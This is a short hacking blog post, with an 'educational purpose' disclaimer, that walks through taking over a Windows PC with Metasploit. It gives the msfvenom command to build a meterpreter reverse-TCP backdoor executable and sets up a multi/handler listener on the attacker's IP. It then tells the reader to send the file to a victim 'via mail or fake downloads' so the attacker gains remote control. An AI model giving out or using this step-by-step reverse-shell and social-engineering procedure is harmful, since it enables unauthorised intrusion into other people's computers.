KingsOfCodes
Disclaimer
This post is only for an Educational purpose. Any actions and or activities related to the material contained within this Website is solely your responsibility.The misuse of the information in this website can result in criminal charges brought against the persons in question. The authors and www.kingsofcodes.ml will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.
This post is only for an Educational purpose. Any actions and or activities related to the material contained within this Website is solely your responsibility.The misuse of the information in this website can result in criminal charges brought against the persons in question. The authors and www.kingsofcodes.ml will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.
HACKING PC With Kali Linux
Today lets see how to hack Windows PC using Kali Linux
To Hack Windows we need to create a payload that will act as a backdoor for us to get into that PC. To create payload for windows.
Open terminal and Type
msfvenom -p windows/meterpreter/reverse_tcp - platform windows-a x86 -f exe -o /root/Desktop/back.exe
Step 2: Starting the Metasploit Framework Console
For controlling the payload we need to start the Metasploit Framework Concole which is prebuilt in Kali Linux.
The Metasploit Framework Console has many payloads and many exploit method.
To start the Metasploit Framework Console. In the terminal type
msfconsole
Step 3: Choosing the Exploit Method
As I have said the Metasploit Framework Console has many exploitation method.
In this we will use the multi handler.
Type
use exploit/multi/handler
Step 4: Setting the Payload
In above step we set our exploitation method. In this step we need to specify the payload that we have created.
Type
set payload windows/meterpreter/reverse_tcp
Step 5: Providing Ip for Backdooring
In this step we need to provide the ip address of our machine so that the payload will connect to our system.
To find the ip address, open terminal and type ifconfig, and copy your ip address.
Then we have to set it in the msfconsole, so type
set LHOST (your ip address)
Step 6: Sending the File and Exploiting
After we have given all the information. We need to send the .exe file we created before to the victim via mail or fake downloads. make sure that the victim install the files.
After doing it, in the msfconsole command, type
exploit
After this command it will show you the victim terminal and you can control it.
Type this command to get commands list to control victim's PC
Post a Comment
Hi Users, if you have any queries then please let me know.